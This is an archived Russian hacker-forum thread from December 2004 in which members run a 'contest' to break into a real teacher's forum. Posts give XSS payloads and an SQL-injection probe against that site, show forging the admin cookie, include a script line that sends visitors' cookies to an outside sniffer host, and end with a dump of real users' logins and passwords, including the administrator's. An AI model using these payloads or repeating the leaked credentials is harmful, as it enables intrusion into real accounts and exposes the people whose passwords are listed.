PDA

Просмотр полной версии : Конкурс: поимей препода


Че Гевара
26.12.2004, 12:17
Конкурс: поимей препода


Вчера с Егором за фигню угарали и нашли очень примитивный форум с очень примитивной защитой (хотя само понятие слова "защита" тут не употребимо) ...

В общем есть форум http://prepod.km.ru/forum/index.php

Вы там регистрируетесь, находите "уязвимость", авторизируетесь под админом и в админке выдираете из БД форума все логины и пароли зарегистрированных юзеров ...

Примичание: пароль к аккаунту администратора на форуме совпадает с паролем на e-mail ...

Кто первый с этим справится и отпишется тут, тот получит собственный статус на форуме :D

Конкурс детский, так что призы тоже детские ...

SHiTS
26.12.2004, 13:54
один вопрос от начинающего хацкера-надо в html копаться или использовать id?

Че Гевара
26.12.2004, 14:12
На форуме есть xss в теге

[img]javascript:alert(document.cookie);

+ еще xss в поиске:

http://prepod.km.ru/forum/search.php?text_poisk=%3Cscript%3Ejavascript:alert ();%3C/script%3E

Тут куки даже на сниффер высылать не надо ...
К тому же можно было покопаться с http://prepod.km.ru/forum/forum_tems.php?t=1&cat='
Но тут все гораздо проще ...

SHiTS
26.12.2004, 14:20
не,тут я не силен

madnet
26.12.2004, 14:27
lol - ну и система аутентификации :)))))
2Shits тебе не советовал бы по форуму лазить, когда там админ сидит,
темболее называясь грозным именем Hacker(SHiTS)

SHiTS
26.12.2004, 14:33
да пофиг,лучше скажи как пассы узнать!
я че-то где-то когда-то смотрел,по моему padonak.ru или .net ломали через куку
а тут че делать?

madnet
26.12.2004, 14:35
Да млин элементарнее не может быть, вот только админ свалит Ж)

SHiTS
26.12.2004, 14:37
все вы такие...

Че Гевара
26.12.2004, 14:38
Ну блин ... Тут они еще думают ...
madnet
Ты то хоть прошел конкурс ? )

madnet
26.12.2004, 14:41
Странноватые cookies
board_user_cook=belo4ka
board_user_id=9
а у админа как не странно
board_user_cook=prepod
board_user_id=1
Гы :)

SHiTS
26.12.2004, 14:43
ну ЭТО ПОНЯТНО!!!
а узнать пассы как?!?!?!

Че Гевара
26.12.2004, 14:46
Скидывайте сюда пароль его ...
Я говорил в самом начале про них ...

SHiTS
26.12.2004, 14:48
ты мне или madnet'y?
расскажи как всё-таки пассы узнать???
я в скриптах не секу,больше взломом юзверей занимаюсь,поэтому напишите как вы форум крякнули?!

madnet
26.12.2004, 15:07
Я теперь Лукитин :)
prepod.km.ru/forum/view_all_topic.php?m_id=22&mid=22&t=1&cat=2

Учитель истории и права высшей категории, методист по истории ЮАО г. Москвы, лауреат премии Вильчанской и "Грант Москвы", Учитель года Москвы - 2004, автор нескольких пособий по истории России, статей и мультимедийных изданий. Увлечения: работа, театр, музыка, ИТ.

madnet
26.12.2004, 15:09
Гы-гы админ в панике смотрите пока не удалил:)

madnet
26.12.2004, 15:10
Злой какой забанил 2 proxy Ж)

Че Гевара
26.12.2004, 15:11
Конкурс усложнился )
Когда препод зашел на свой форум и увидел, что у него зарегистрировались страшные хакеры с никами Hacker(SHiTS) (c паролем 123456)& belo4ka (с паролем belka), то препод страшно пересрался и забанил их с форума ! Теперь взломщикам надо обойти бан злостного преподавателя Центра Исторического Образования и поиметь его по самое нехочу =)

madnet
26.12.2004, 15:13
:)
Это дейсвительно сложно :)

madnet
26.12.2004, 15:14
Он убил мою белочку :(

Че Гевара
26.12.2004, 15:25
Что за сцука ента белочка ?
Что она оставляет мне мессаги:

:)
Где можно скачать контрольные для 10
класса по математике
img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
Как найду ее - за кафедрой выебу! =)))

madnet
26.12.2004, 15:28
Звиняйте она больше не будет
Cry :-(

SHiTS
26.12.2004, 18:13
мда, Че Гевара не на шутку прикололся.
насчет бана -фиг с ним всё равно не буду даже париться,бабки на нет жалко

madnet
26.12.2004, 18:24
Следующий раз прежде подумай, а потом делай
Lol :)

SHiTS
26.12.2004, 18:28
а че думать?
тут и так всё ясно.

madnet
26.12.2004, 18:33
Что-то не вижу паролей от тебя :)

SHiTS
26.12.2004, 19:00
забей .......

4ugak[NhT]
27.12.2004, 17:25
Все юзеры разбанены!! Конкурс действительно легкий)))

'prepod', 'ctvetochek'
'Андрей Лукутин', 'ctvetochek'
'Юлия', '175427',
'Аня', 'z,kjrj',
'Adia', '232323',
'31337', '31337',
'egro', '123454321',
'SHiTS', '123456',
'belo4ka', 'belka',
'Hacker(SHiTS)', '123456',
'ne_belo4ka', 'belka',
'Синев', 'sex',
'Смирнов', 'spirt',
'Petrov', 'piter',
'Ass', 'ass', 'ass@ass.ass',
'Zed', 'zed',
'Slava', 'qqq',
'Привет от SHiTS', '123456',
'pepsicola', 'nenavijuavtoinspekto',
'Цой', 'musik',
'Admin', 'qwerty'

Че Гевара
27.12.2004, 17:50
Гы )
Наконец-то злого препода поимели по самое нехочу )
Всех благодаою за участие ))

madnet

4ugak[NhT]

SHiTS (тебе за яростное стремление впендюрить преподу)

Пишите какие статусы вы хотите ...

madnet
27.12.2004, 17:51
Хочу статус смерти :) +

4ugak[NhT]
27.12.2004, 17:55
2madnet

только увидел конкурс и моментом прошел)

madnet
27.12.2004, 17:59
Ты молодец :)

Че Гевара
27.12.2004, 18:00
Хочу статус смерти :) + Как писаться будет ? "Страшная Смерть" ? :D

madnet
27.12.2004, 18:05
Я думаю просто и скромно
СМЕРТЬ

madnet
27.12.2004, 18:46
big tnx
КРАСАВА
):-}

PEPSICOLA
28.12.2004, 02:45
http://www.cast.uark.edu/~kkvamme/cool.gif

madnet
28.12.2004, 03:36
Pepsi,
Ты как раз просил меня поменять аватар, а то страшный,
надеюсь угодил тебе? Ж)

SHiTS
28.12.2004, 10:57
а можно тож че-нить?а?

SHiTS
28.12.2004, 11:11
я бы хотел такую подпись))
кулхацкер
штоб стимул был)))

madnet
28.12.2004, 14:44
Лучше HACKER(SHiTS) !!! :)
Как на prepode :)

SHiTS
28.12.2004, 14:54
ага типа
SHiTS,HACKER(SHiTS)
или дамм,ван дамм,клод ван дамм,жан клод ван дамм
гыгы
КУЛХАЦКЕР

madnet
28.12.2004, 18:26
Парни, подкиньте еще конкурсик, а то так весело время провели.

PEPSICOLA
28.12.2004, 19:56
Madnet, я тебе вот что скажу... Аватар у тебя просто невъеб*нно ох*енный! Был ацтой.
Можешь гордиться им =) Ламеры будут 100% в жуткой зависти с чувством ох*евшей вины в промышленном маштабе!!!

SHiTS
29.12.2004, 12:43
мож мне тоже поменять?а?

ЗЫ как насчет статуса?

4ugak[NhT]
29.12.2004, 17:42
на web-hack.ru проходите конкурс, я за... его проходить, все в тупик уходит, там минимум знаний по хакерству надо)

SHiTS
29.12.2004, 17:49
да ладно тебе минимум,щас посмотрим....
новогодний штоли?
так-так...
ага...
мда...
задачка...
С Новым Годом-более ниче в голову не лезет...

SHiTS
29.12.2004, 18:12
КОНКУРС ПРОЙДЕН!!!

SHiTS
29.12.2004, 19:08
Админы сделайте еще какой-нить конкурс плиз))
оч. предыдущий понравился
или как на web-hack'e
глядишь я че-нить научусь дефейсить ломать итп

PEPSICOLA
29.12.2004, 20:10
Ну тоже поменяй аватар вообщем то :) Нужен эфективный :) Что бы те кто смотрел - были просто в ах*е =)

SHiTS
29.12.2004, 20:23
зацени чувак!

SHiTS
29.12.2004, 20:23
АААААААААААААААА
так мне статус поменяли!!!!!!!
АААААА
ПАСИБАААААА!!!!

madnet
29.12.2004, 23:28
lol
:)

4ugak[NhT]
30.12.2004, 08:51
SHiTS

жди, скоро от Nht будет конкурс, может быть =)

SHiTS
30.12.2004, 14:00
ок,будем ждать))

SHiTS
30.12.2004, 17:06
теперь проходим конкурс журнала ][акер(декабрь2004)
www.padonak.ru
вот